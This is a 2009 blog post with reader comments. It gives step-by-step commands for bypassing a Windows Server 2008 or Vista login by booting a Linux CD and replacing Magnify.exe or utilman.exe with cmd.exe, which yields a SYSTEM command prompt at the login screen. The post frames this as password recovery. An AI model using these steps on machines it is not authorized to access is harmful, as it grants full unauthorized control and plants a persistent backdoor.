Stephen
In this article we will demonstrate a simple and effective way to bypass Windows Server 2008 password protection in the case where we have forgotten the password and need to get access to our system
The following approach can be used only in cases where we have forgotten the password or it has been changed by a third party for reasons beyond us.
Note: Do NOT use this approach to backdoor any server in your work environment!
Tools used for this demonstration:
PING (Partimage Is Not Ghost)
Download: http://ping.windowsdream.com/ping/Releases/3.00.01/PING-3.00.iso (~22MB)
The workaround:
1) Boot with PING Linux distribution
2) fdisk -l | grep NTFS
3) mkdir -p /mnt/windows
4) mount -t ntfs-3g /dev/sda1 /mnt/windows
5) cd /mnt/windows/Windows/System32
6) mv Magnify.exe Magnify.bck
7) cp cmd.exe Magnify.exe and rebootPreview:
Booting into Windows Server 2008:
1) Click on Ease Of Access
2) Select “Make items on the screen larger (Magnifier)
3) Click OK
4) On Command Prompt type explorerPreviews:
1) Ease of Access
2) Getting Command Prompt
3) Interacting with Windows Explorer
The following approach can be used with Windows Vista and also by any other Ease Of Access tools or even by Ease Of Access itself by renaming “utilman.exe” to “cmd.exe”.
February 17, 2009
Man, that is hilarious! What is the user privilege of the account that is logged into under this method? i’ll be really impressed if it’s administrator. great little hack tho.
[Reply]
February 18, 2009
Hello Paul,
The privileges are higher than Administrator. You are using NT AUTHORITY/SYSTEM.
Glafkos
[Reply]
March 2, 2009
All I get is a dialog asking me to back-up the system?
What do you do after the boot CD has finished loading?
[Reply]
March 3, 2009
Thank you very much.This trick really worked for me.Just to add on ,if you are using command line by microsoft you can reset your password too.Thank a load.
http://support.microsoft.com/kb/149427
[Reply]
January 23, 2010
A year later and this still works like a champ. This article was a godsend for me as I was dreading having to rebuild my domain controller and all of the virtual machines running on it.
I am not a linux guy but your steps were fairly clear (missing only a couple minor points). I created a blog article to cover this as well as I think this is just pure genius and others should know about it.
[Reply]
February 8, 2010
thanx. I will have a try
[Reply]
February 10, 2010
Is it not a little bit easy to use a live “mini windows xp” and access to the windows/system32, rename the Magnify.exe to Magnify.bck and after cop cmd.exe and rename to Magnify.exe?
I don’t know because I never try…but it should work…
[Reply]
February 23, 2010
Glafkos you are a life (and money) saver took me 5 mins n works like magic thanks a lot man
[Reply]
Glafkos Charalambous Reply:
February 23rd, 2010 at 10:49 pm
You are welcome
[Reply]
March 30, 2010
Linux rocks. Thanks Glafkos man
[Reply]
April 17, 2010
This worked!!!! Amazing!!!
[Reply]
April 30, 2010
Great solution! You saved me… It’s a really easy to use solution… It shows how “secure” is windows…
[Reply]